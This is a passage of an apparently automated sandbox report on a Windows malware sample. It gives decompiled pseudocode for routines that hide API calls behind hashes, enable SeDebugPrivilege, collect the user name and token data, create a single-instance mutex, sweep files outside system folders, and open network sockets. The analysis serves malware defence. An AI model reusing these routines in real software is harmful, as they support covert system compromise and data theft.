							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb4
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f58
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc4
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8c
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}

0x00406512
0x00406514
0x00406522
0x00406524
0x00406530
0x00406534
0x0040653f
0x0040654e
0x00406552
0x0040655a
0x0040655f
0x0040656d
0x00406570
0x00406573
0x0040657a
0x00406589
0x0040658d
0x00406590
0x00406594
0x00000000
0x0040659a
0x004065a1

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}

0x004042cf
0x004042d5
0x004042df
0x004042e2
0x004042f9
0x004042fb
0x00404300
0x0040430a
0x00404314
0x00404319
0x00404323
0x00404334
0x0040433b
0x0040433b
0x0040433f
0x00404344
0x0040434c

APIs

